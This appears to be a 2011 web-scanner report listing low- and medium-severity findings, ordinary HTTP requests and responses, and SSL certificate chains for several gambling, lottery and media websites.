HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: core.startpage.viewe Set-Cookie: lggdnstt=0; path=/ X-Powered-By: ASP.NET p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Date: Mon, 16 May 2011 12:08:52 GMT Connection: close Content-Length: 42417 Set-Cookie: BIGipServerwww.betsson Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="head"> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.betsson.com |
Path: | /start/is/ |
GET /start/is/ HTTP/1.1 Host: www.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: core.startpage.viewe Set-Cookie: lggdnstt=0; path=/ X-Powered-By: ASP.NET p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Date: Mon, 16 May 2011 12:08:50 GMT Connection: close Content-Length: 39256 Set-Cookie: BIGipServerwww.betsson Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="head"> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.interwetten |
Path: | / |
GET / HTTP/1.1 Host: www.interwetten.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: https://www.interwetten Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:43:41 GMT Connection: Keep-Alive Set-Cookie: BIGipServerPool_Web01 Vary: Accept-Encoding Content-Length: 165 <head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="http://www |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.postcode |
Path: | /PlayNOW/OrderYourTickets |
GET /PlayNOW/OrderYourTickets Host: www.postcodelottery.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=91262363 |
HTTP/1.0 200 OK Date: Mon, 16 May 2011 12:32:10 GMT Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat Last-Modified: Mon, 16 May 2011 12:32:10 GMT Cache-Control: private, must-revalidate Expires: Wed, 16 Aug 2000 10:00:00 GMT Content-Type: text/html;charset=utf-8 Set-Cookie: BALANCEID=balancer.route1 Set-Cookie: BALANCEID=balancer.route1 Vary: Accept-Encoding Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="short ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.thawte.com |
Path: | / |
GET / HTTP/1.1 Host: www.thawte.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 11:58:53 GMT Server: Apache Set-Cookie: v1st=5154A4B37CB7DE69; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com Set-Cookie: v1st=5154A4B37CB7DE69; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 39378 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Co ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.facebook.com |
Path: | /extern/login_status.php |
GET /extern/login_status.php Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.metacafe.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 302 Found Location: http://static.ak.fbcdn Content-Type: text/html; charset=utf-8 X-FB-Server: 10.43.138.33 X-Cnection: close Date: Mon, 16 May 2011 12:49:43 GMT Content-Length: 0 |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.heavenaff |
Path: | / |
GET / HTTP/1.1 Host: www.heavenaffiliates.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:02:32 GMT Server: Apache FrontPage/5.0.2.2635 mod_bwlimited/1.4 mod_auth_passthrough/2.1 X-Powered-By: PHP/5.2.15 X-Pingback: http://www.heavenaff Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20304 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title> He ...[SNIP]... <li> <a href="http://server.iad ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.metacafe.com |
Path: | /fplayer/ |
GET /fplayer/ HTTP/1.1 Host: www.metacafe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: CP="NOI CUR ADM OUR NOR STA NID" Content-Type: text/html Date: Mon, 16 May 2011 12:25:14 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: PHPSESSID=b34cef86fb Set-Cookie: OAGEO=US%7CTX%7CDallas Set-Cookie: OAID=b26d5505ed27474 Set-Cookie: User=%7B%22sc%22%3A1%2C Set-Cookie: dsavip=3333427372.20480 Content-Length: 73965 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <li class="Account" id="Register"><a href="https://secure ...[SNIP]... <li class="Account" id="SignIn"><a href="https://secure ...[SNIP]... <li class="report" id="Submit"><a href="https://secure ...[SNIP]... <li><a href="https://secure ...[SNIP]... <li><a href="https://secure ...[SNIP]... <li><a href="https://secure ...[SNIP]... <li><a id="CountryFlag" href="https://secure ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.youtube.com |
Path: | /user/CrazyScratchCom |
GET /user/CrazyScratchCom HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 11:58:44 GMT Server: Apache X-Content-Type-Options: nosniff Set-Cookie: use_hitbox=72c46ff6c Set-Cookie: VISITOR_INFO1_LIVE Set-Cookie: GEO=dfb55d2f94c5feeb Expires: Tue, 27 Apr 1971 19:44:06 EST Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Connection: close <!DOCTYPE html> <html lang="en" dir="ltr" xmlns:og="http:/ <!-- machid: sWkFSZzctYUFHdmpGMkp <head> ...[SNIP]... <link rel="canonical" href="/user/CrazyScr <link rel="alternate" media="handheld" href="http://m.youtube <meta name="title" content=""> ...[SNIP]... </style> <link rel="alternate" media="handheld" href="http://m.youtube <link rel="alternate" type="application/rss+xml ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.youtube.com |
Path: | /user/PostcodeLottery |
GET /user/PostcodeLottery HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 11:58:44 GMT Server: Apache X-Content-Type-Options: nosniff Set-Cookie: use_hitbox=72c46ff6c Set-Cookie: VISITOR_INFO1_LIVE Set-Cookie: GEO=dfb55d2f94c5feeb Expires: Tue, 27 Apr 1971 19:44:06 EST Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Connection: close <!DOCTYPE html> <html lang="en" dir="ltr" xmlns:og="http:/ <!-- machid: sd1dXU2oteFNMSkZHd0Z <head> ...[SNIP]... <link rel="canonical" href="/user/Postcode <link rel="alternate" media="handheld" href="http://m.youtube <meta name="title" content="The People's Postcode Lottery"> ...[SNIP]... </style> <link rel="alternate" media="handheld" href="http://m.youtube <link rel="alternate" type="application/rss+xml ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.youtube.com |
Path: | /user/primescratchcards1 |
GET /user/primescratchcards1 HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 11:58:46 GMT Server: Apache X-Content-Type-Options: nosniff Set-Cookie: use_hitbox=72c46ff6c Set-Cookie: VISITOR_INFO1_LIVE Set-Cookie: GEO=8d3458027bf69c9d Expires: Tue, 27 Apr 1971 19:44:06 EST Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Connection: close <!DOCTYPE html> <html lang="en" dir="ltr" xmlns:og="http:/ <!-- machid: sWkFSZzctYUFHdmh6U2N <head> ...[SNIP]... <link rel="canonical" href="/user/primescr <link rel="alternate" media="handheld" href="http://m.youtube <meta name="title" content=""> ...[SNIP]... </style> <link rel="alternate" media="handheld" href="http://m.youtube <link rel="alternate" type="application/rss+xml ...[SNIP]... |
Severity: | Medium |
Confidence: | Certain |
Host: | https://clicktale |
Path: | / |
Issued to: | *.pantherssl.com |
Issued by: | DigiCert High Assurance CA-3 |
Valid from: | Wed Oct 27 19:00:00 CDT 2010 |
Valid to: | Tue Dec 11 17:59:59 CST 2012 |
Issued to: | DigiCert High Assurance CA-3 |
Issued by: | DigiCert High Assurance EV Root CA |
Valid from: | Mon Apr 02 19:00:00 CDT 2007 |
Valid to: | Sat Apr 02 19:00:00 CDT 2022 |
Issued to: | DigiCert High Assurance EV Root CA |
Issued by: | Entrust.net Secure Server Certification Authority |
Valid from: | Sun Oct 01 00:00:00 CDT 2006 |
Valid to: | Sat Jul 26 13:15:15 CDT 2014 |
Issued to: | Entrust.net Secure Server Certification Authority |
Issued by: | Entrust.net Secure Server Certification Authority |
Valid from: | Tue May 25 11:09:40 CDT 1999 |
Valid to: | Sat May 25 11:39:40 CDT 2019 |
Severity: | Medium |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | / |
Issued to: | aspireaffiliates.com |
Issued by: | Go Daddy Secure Certification Authority |
Valid from: | Wed Jan 12 05:35:30 CST 2011 |
Valid to: | Thu Jan 12 05:35:30 CST 2012 |
Issued to: | Go Daddy Secure Certification Authority |
Issued by: | Go Daddy Class 2 Certification Authority |
Valid from: | Wed Nov 15 19:54:37 CST 2006 |
Valid to: | Sun Nov 15 19:54:37 CST 2026 |
Issued to: | Go Daddy Class 2 Certification Authority |
Issued by: | http://www.valicert.com/ |
Valid from: | Tue Jun 29 12:06:20 CDT 2004 |
Valid to: | Sat Jun 29 12:06:20 CDT 2024 |
Issued to: | http://www.valicert.com/ |
Issued by: | http://www.valicert.com/ |
Valid from: | Fri Jun 25 19:19:54 CDT 1999 |
Valid to: | Tue Jun 25 19:19:54 CDT 2019 |
Severity: | Medium |
Confidence: | Certain |
Host: | https://www.thawte.com |
Path: | / |
Issued to: | www.thawte.com |
Issued by: | thawte Extended Validation SSL CA |
Valid from: | Tue Nov 10 18:00:00 CST 2009 |
Valid to: | Fri Nov 11 17:59:59 CST 2011 |
Issued to: | thawte Primary Root CA |
Issued by: | Thawte Premium Server CA |
Valid from: | Thu Nov 16 18:00:00 CST 2006 |
Valid to: | Wed Dec 30 17:59:59 CST 2020 |
Issued to: | thawte Extended Validation SSL CA |
Issued by: | thawte Primary Root CA |
Valid from: | Thu Nov 16 18:00:00 CST 2006 |
Valid to: | Wed Nov 16 17:59:59 CST 2016 |
Issued to: | thawte Primary Root CA |
Issued by: | thawte Primary Root CA |
Valid from: | Thu Nov 16 18:00:00 CST 2006 |
Valid to: | Wed Jul 16 18:59:59 CDT 2036 |
Severity: | Low |
Confidence: | Certain |
Host: | https://help.betsson.com |
Path: | / |
Issued to: | *.betsson.com |
Issued by: | UTN - DATACorp SGC |
Valid from: | Mon Apr 27 19:00:00 CDT 2009 |
Valid to: | Thu Apr 28 18:59:59 CDT 2011 |
Issued to: | UTN - DATACorp SGC |
Issued by: | UTN - DATACorp SGC |
Valid from: | Thu Jun 24 13:57:21 CDT 1999 |
Valid to: | Mon Jun 24 14:06:30 CDT 2019 |
Severity: | Information |
Confidence: | Certain |
Host: | https://bingo.betsson.com |
Path: | / |
Issued to: | *.betsson.com |
Issued by: | COMODO High-Assurance Secure Server CA |
Valid from: | Sun Apr 17 19:00:00 CDT 2011 |
Valid to: | Sun Apr 27 18:59:59 CDT 2014 |
Issued to: | COMODO High-Assurance Secure Server CA |
Issued by: | AddTrust External CA Root |
Valid from: | Thu Apr 15 19:00:00 CDT 2010 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Issued to: | AddTrust External CA Root |
Issued by: | AddTrust External CA Root |
Valid from: | Tue May 30 05:48:38 CDT 2000 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Issued to: | AddTrust External CA Root |
Issued by: | AddTrust External CA Root |
Valid from: | Tue May 30 05:48:38 CDT 2000 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Severity: | Information |
Confidence: | Certain |
Host: | https://ble.hs.llnwd.net |
Path: | / |
Issued to: | *.hs.llnwd.net |
Issued by: | Equifax Secure Certificate Authority |
Valid from: | Mon Jun 15 09:39:34 CDT 2009 |
Valid to: | Sun Sep 16 01:17:48 CDT 2012 |
Issued to: | Equifax Secure Certificate Authority |
Issued by: | Equifax Secure Certificate Authority |
Valid from: | Sat Aug 22 11:41:51 CDT 1998 |
Valid to: | Wed Aug 22 11:41:51 CDT 2018 |
Issued to: | Equifax Secure Certificate Authority |
Issued by: | Equifax Secure Certificate Authority |
Valid from: | Sat Aug 22 11:41:51 CDT 1998 |
Valid to: | Wed Aug 22 11:41:51 CDT 2018 |
Severity: | Information |
Confidence: | Certain |
Host: | https://casino.betsson |
Path: | / |
Issued to: | *.betsson.com |
Issued by: | COMODO High-Assurance Secure Server CA |
Valid from: | Sun Apr 17 19:00:00 CDT 2011 |
Valid to: | Sun Apr 27 18:59:59 CDT 2014 |
Issued to: | COMODO High-Assurance Secure Server CA |
Issued by: | AddTrust External CA Root |
Valid from: | Thu Apr 15 19:00:00 CDT 2010 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Issued to: | AddTrust External CA Root |
Issued by: | AddTrust External CA Root |
Valid from: | Tue May 30 05:48:38 CDT 2000 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Issued to: | AddTrust External CA Root |
Issued by: | AddTrust External CA Root |
Valid from: | Tue May 30 05:48:38 CDT 2000 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Severity: | Information |
Confidence: | Certain |
Host: | https://download |
Path: | / |
Issued to: | download.macromedia.com,ST=California |
Issued by: | Akamai Subordinate CA 3 |
Valid from: | Tue Apr 19 10:37:25 CDT 2011 |
Valid to: | Thu Apr 19 10:37:25 CDT 2012 |
Issued to: | Akamai Subordinate CA 3 |
Issued by: | GTE CyberTrust Global Root |
Valid from: | Thu May 11 10:32:00 CDT 2006 |
Valid to: | Sat May 11 18:59:00 CDT 2013 |
Issued to: | GTE CyberTrust Global Root |
Issued by: | GTE CyberTrust Global Root |
Valid from: | Wed Aug 12 19:29:00 CDT 1998 |
Valid to: | Mon Aug 13 18:59:00 CDT 2018 |
Severity: | Information |
Confidence: | Certain |
Host: | https://download.neogames |
Path: | / |
Issued to: | download.neogames-tech.com |
Issued by: | Thawte Server CA |
Valid from: | Mon Apr 05 19:00:00 CDT 2010 |
Valid to: | Sun May 06 18:59:59 CDT 2012 |
Issued to: | Thawte Server CA |
Issued by: | Thawte Server CA |
Valid from: | Wed Jul 31 19:00:00 CDT 1996 |
Valid to: | Fri Jan 01 17:59:59 CST 2021 |
Severity: | Information |
Confidence: | Certain |
Host: | https://games.betsson.com |
Path: | / |
Issued to: | *.betsson.com |
Issued by: | COMODO High-Assurance Secure Server CA |
Valid from: | Sun Apr 17 19:00:00 CDT 2011 |
Valid to: | Sun Apr 27 18:59:59 CDT 2014 |
Issued to: | COMODO High-Assurance Secure Server CA |
Issued by: | AddTrust External CA Root |
Valid from: | Thu Apr 15 19:00:00 CDT 2010 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Issued to: | AddTrust External CA Root |
Issued by: | AddTrust External CA Root |
Valid from: | Tue May 30 05:48:38 CDT 2000 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Issued to: | AddTrust External CA Root |
Issued by: | AddTrust External CA Root |
Valid from: | Tue May 30 05:48:38 CDT 2000 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Severity: | Information |
Confidence: | Certain |
Host: | https://in.getclicky.com |
Path: | / |
Issued to: | *.getclicky.com |
Issued by: | Go Daddy Secure Certification Authority |
Valid from: | Mon Aug 09 18:49:23 CDT 2010 |
Valid to: | Sun Aug 09 18:49:23 CDT 2015 |
Issued to: | Go Daddy Secure Certification Authority |
Issued by: | Go Daddy Class 2 Certification Authority |
Valid from: | Wed Nov 15 19:54:37 CST 2006 |
Valid to: | Sun Nov 15 19:54:37 CST 2026 |
Issued to: | Go Daddy Class 2 Certification Authority |
Issued by: | http://www.valicert.com/ |
Valid from: | Tue Jun 29 12:06:20 CDT 2004 |
Valid to: | Sat Jun 29 12:06:20 CDT 2024 |
Issued to: | http://www.valicert.com/ |
Issued by: | http://www.valicert.com/ |
Valid from: | Fri Jun 25 19:19:54 CDT 1999 |
Valid to: | Tue Jun 25 19:19:54 CDT 2019 |
Issued to: | http://www.valicert.com/ |
Issued by: | http://www.valicert.com/ |
Valid from: | Fri Jun 25 19:19:54 CDT 1999 |
Valid to: | Tue Jun 25 19:19:54 CDT 2019 |
Severity: | Information |
Confidence: | Certain |
Host: | https://livecasino |
Path: | / |
Issued to: | *.betsson.com |
Issued by: | COMODO High-Assurance Secure Server CA |
Valid from: | Sun Apr 17 19:00:00 CDT 2011 |
Valid to: | Sun Apr 27 18:59:59 CDT 2014 |
Issued to: | COMODO High-Assurance Secure Server CA |
Issued by: | AddTrust External CA Root |
Valid from: | Thu Apr 15 19:00:00 CDT 2010 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Issued to: | AddTrust External CA Root |
Issued by: | AddTrust External CA Root |
Valid from: | Tue May 30 05:48:38 CDT 2000 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Issued to: | AddTrust External CA Root |
Issued by: | AddTrust External CA Root |
Valid from: | Tue May 30 05:48:38 CDT 2000 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Severity: | Information |
Confidence: | Certain |
Host: | https://members.bet365 |
Path: | / |
Issued to: | members.bet365.com |
Issued by: | Thawte SSL CA |
Valid from: | Sun Nov 14 18:00:00 CST 2010 |
Valid to: | Thu Nov 14 17:59:59 CST 2013 |
Issued to: | Thawte SSL CA |
Issued by: | thawte Primary Root CA |
Valid from: | Sun Feb 07 18:00:00 CST 2010 |
Valid to: | Fri Feb 07 17:59:59 CST 2020 |
Issued to: | thawte Primary Root CA |
Issued by: | thawte Primary Root CA |
Valid from: | Thu Nov 16 18:00:00 CST 2006 |
Valid to: | Wed Jul 16 18:59:59 CDT 2036 |
Severity: | Information |
Confidence: | Certain |
Host: | https://poker.betsson.com |
Path: | / |
Issued to: | *.betsson.com |
Issued by: | COMODO High-Assurance Secure Server CA |
Valid from: | Sun Apr 17 19:00:00 CDT 2011 |
Valid to: | Sun Apr 27 18:59:59 CDT 2014 |
Issued to: | COMODO High-Assurance Secure Server CA |
Issued by: | AddTrust External CA Root |
Valid from: | Thu Apr 15 19:00:00 CDT 2010 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Issued to: | AddTrust External CA Root |
Issued by: | AddTrust External CA Root |
Valid from: | Tue May 30 05:48:38 CDT 2000 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Issued to: | AddTrust External CA Root |
Issued by: | AddTrust External CA Root |
Valid from: | Tue May 30 05:48:38 CDT 2000 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Severity: | Information |
Confidence: | Certain |
Host: | https://scratch.betsson |
Path: | / |
Issued to: | *.betsson.com |
Issued by: | COMODO High-Assurance Secure Server CA |
Valid from: | Sun Apr 17 19:00:00 CDT 2011 |
Valid to: | Sun Apr 27 18:59:59 CDT 2014 |
Issued to: | COMODO High-Assurance Secure Server CA |
Issued by: | AddTrust External CA Root |
Valid from: | Thu Apr 15 19:00:00 CDT 2010 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Issued to: | AddTrust External CA Root |
Issued by: | AddTrust External CA Root |
Valid from: | Tue May 30 05:48:38 CDT 2000 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Issued to: | AddTrust External CA Root |
Issued by: | AddTrust External CA Root |
Valid from: | Tue May 30 05:48:38 CDT 2000 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Severity: | Information |
Confidence: | Certain |
Host: | https://seal.verisign.com |
Path: | / |
Issued to: | seal.verisign.com |
Issued by: | VeriSign Class 3 Secure Server CA - G2 |
Valid from: | Tue Jul 06 19:00:00 CDT 2010 |
Valid to: | Sun Jul 06 18:59:59 CDT 2014 |
Issued to: | VeriSign Class 3 Secure Server CA - G2 |
Issued by: | VeriSign Trust Network |
Valid from: | Tue Mar 24 19:00:00 CDT 2009 |
Valid to: | Sun Mar 24 18:59:59 CDT 2019 |
Issued to: | VeriSign Trust Network |
Issued by: | VeriSign Trust Network |
Valid from: | Sun May 17 19:00:00 CDT 1998 |
Valid to: | Tue Aug 01 18:59:59 CDT 2028 |
Issued to: | VeriSign Trust Network |
Issued by: | VeriSign Trust Network |
Valid from: | Sun May 17 19:00:00 CDT 1998 |
Valid to: | Tue Aug 01 18:59:59 CDT 2028 |
Severity: | Information |
Confidence: | Certain |
Host: | https://sealinfo.verisign |
Path: | / |
Issued to: | sealinfo.verisign.com |
Issued by: | VeriSign Class 3 Extended Validation SSL SGC CA |
Valid from: | Mon Mar 22 19:00:00 CDT 2010 |
Valid to: | Thu Mar 22 18:59:59 CDT 2012 |
Issued to: | VeriSign Class 3 Extended Validation SSL SGC CA |
Issued by: | VeriSign Class 3 Public Primary Certification Authority - G5 |
Valid from: | Tue Nov 07 18:00:00 CST 2006 |
Valid to: | Mon Nov 07 17:59:59 CST 2016 |
Issued to: | VeriSign Class 3 Public Primary Certification Authority - G5 |
Issued by: | Class 3 Public Primary Certification Authority |
Valid from: | Tue Nov 07 18:00:00 CST 2006 |
Valid to: | Sun Nov 07 17:59:59 CST 2021 |
Issued to: | Class 3 Public Primary Certification Authority |
Issued by: | Class 3 Public Primary Certification Authority |
Valid from: | Sun Jan 28 18:00:00 CST 1996 |
Valid to: | Wed Aug 02 18:59:59 CDT 2028 |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.neogames |
Path: | / |
Issued to: | secure.neogames-tech.com |
Issued by: | VeriSign Class 3 Secure Server CA - G3 |
Valid from: | Mon Nov 01 19:00:00 CDT 2010 |
Valid to: | Sat Dec 01 17:59:59 CST 2012 |
Issued to: | VeriSign Class 3 Secure Server CA - G3 |
Issued by: | VeriSign Class 3 Public Primary Certification Authority - G5 |
Valid from: | Sun Feb 07 18:00:00 CST 2010 |
Valid to: | Fri Feb 07 17:59:59 CST 2020 |
Issued to: | VeriSign Class 3 Public Primary Certification Authority - G5 |
Issued by: | Class 3 Public Primary Certification Authority |
Valid from: | Tue Nov 07 18:00:00 CST 2006 |
Valid to: | Sun Nov 07 17:59:59 CST 2021 |
Issued to: | Class 3 Public Primary Certification Authority |
Issued by: | Class 3 Public Primary Certification Authority |
Valid from: | Sun Jan 28 18:00:00 CST 1996 |
Valid to: | Wed Aug 02 18:59:59 CDT 2028 |
Severity: | Information |
Confidence: | Certain |
Host: | https://static.getclicky |
Path: | / |
Issued to: | *.getclicky.com |
Issued by: | Go Daddy Secure Certification Authority |
Valid from: | Mon Aug 09 18:49:23 CDT 2010 |
Valid to: | Sun Aug 09 18:49:23 CDT 2015 |
Issued to: | Go Daddy Secure Certification Authority |
Issued by: | Go Daddy Class 2 Certification Authority |
Valid from: | Wed Nov 15 19:54:37 CST 2006 |
Valid to: | Sun Nov 15 19:54:37 CST 2026 |
Issued to: | Go Daddy Class 2 Certification Authority |
Issued by: | http://www.valicert.com/ |
Valid from: | Tue Jun 29 12:06:20 CDT 2004 |
Valid to: | Sat Jun 29 12:06:20 CDT 2024 |
Issued to: | http://www.valicert.com/ |
Issued by: | http://www.valicert.com/ |
Valid from: | Fri Jun 25 19:19:54 CDT 1999 |
Valid to: | Tue Jun 25 19:19:54 CDT 2019 |
Issued to: | http://www.valicert.com/ |
Issued by: | http://www.valicert.com/ |
Valid from: | Fri Jun 25 19:19:54 CDT 1999 |
Valid to: | Tue Jun 25 19:19:54 CDT 2019 |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.betsson.com |
Path: | / |
Issued to: | www.betsson.com |
Issued by: | VeriSign Class 3 Extended Validation SSL SGC CA |
Valid from: | Tue Apr 06 19:00:00 CDT 2010 |
Valid to: | Fri Apr 06 18:59:59 CDT 2012 |
Issued to: | VeriSign Class 3 Extended Validation SSL SGC CA |
Issued by: | VeriSign Class 3 Public Primary Certification Authority - G5 |
Valid from: | Tue Nov 07 18:00:00 CST 2006 |
Valid to: | Mon Nov 07 17:59:59 CST 2016 |
Issued to: | VeriSign Class 3 Public Primary Certification Authority - G5 |
Issued by: | VeriSign Class 3 Public Primary Certification Authority - G5 |
Valid from: | Tue Nov 07 18:00:00 CST 2006 |
Valid to: | Wed Jul 16 18:59:59 CDT 2036 |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.interwetten |
Path: | / |
Issued to: | *.interwetten.com |
Issued by: | Thawte Premium Server CA |
Valid from: | Tue Jan 12 18:00:00 CST 2010 |
Valid to: | Fri Apr 13 18:59:59 CDT 2012 |
Issued to: | Thawte Premium Server CA |
Issued by: | Thawte Premium Server CA |
Valid from: | Wed Jul 31 19:00:00 CDT 1996 |
Valid to: | Fri Jan 01 17:59:59 CST 2021 |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.macromedia |
Path: | / |
Issued to: | www.macromedia.com |
Issued by: | www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign |
Valid from: | Wed Dec 09 18:00:00 CST 2009 |
Valid to: | Sat Dec 10 17:59:59 CST 2011 |
Issued to: | www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign |
Issued by: | Class 3 Public Primary Certification Authority |
Valid from: | Wed Apr 16 19:00:00 CDT 1997 |
Valid to: | Mon Oct 24 18:59:59 CDT 2011 |
Issued to: | Class 3 Public Primary Certification Authority |
Issued by: | Class 3 Public Primary Certification Authority |
Valid from: | Sun Jan 28 18:00:00 CST 1996 |
Valid to: | Wed Aug 02 18:59:59 CDT 2028 |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.neogames |
Path: | / |
Issued to: | www.neogamespartners.com |
Issued by: | Go Daddy Secure Certification Authority |
Valid from: | Thu Feb 10 03:39:51 CST 2011 |
Valid to: | Fri Mar 23 02:34:49 CDT 2012 |
Issued to: | Go Daddy Secure Certification Authority |
Issued by: | Go Daddy Class 2 Certification Authority |
Valid from: | Wed Nov 15 19:54:37 CST 2006 |
Valid to: | Sun Nov 15 19:54:37 CST 2026 |
Issued to: | Go Daddy Class 2 Certification Authority |
Issued by: | http://www.valicert.com/ |
Valid from: | Tue Jun 29 12:06:20 CDT 2004 |
Valid to: | Sat Jun 29 12:06:20 CDT 2024 |
Issued to: | http://www.valicert.com/ |
Issued by: | http://www.valicert.com/ |
Valid from: | Fri Jun 25 19:19:54 CDT 1999 |
Valid to: | Tue Jun 25 19:19:54 CDT 2019 |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.norskelodd |
Path: | / |
Issued to: | *.norskelodd.com |
Issued by: | UTN - DATACorp SGC |
Valid from: | Thu Sep 16 19:00:00 CDT 2010 |
Valid to: | Mon Sep 16 18:59:59 CDT 2013 |
Issued to: | UTN - DATACorp SGC |
Issued by: | UTN - DATACorp SGC |
Valid from: | Thu Jun 24 13:57:21 CDT 1999 |
Valid to: | Mon Jun 24 14:06:30 CDT 2019 |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.postcode |
Path: | / |
Issued to: | www.postcodelottery.com |
Issued by: | Thawte Premium Server CA |
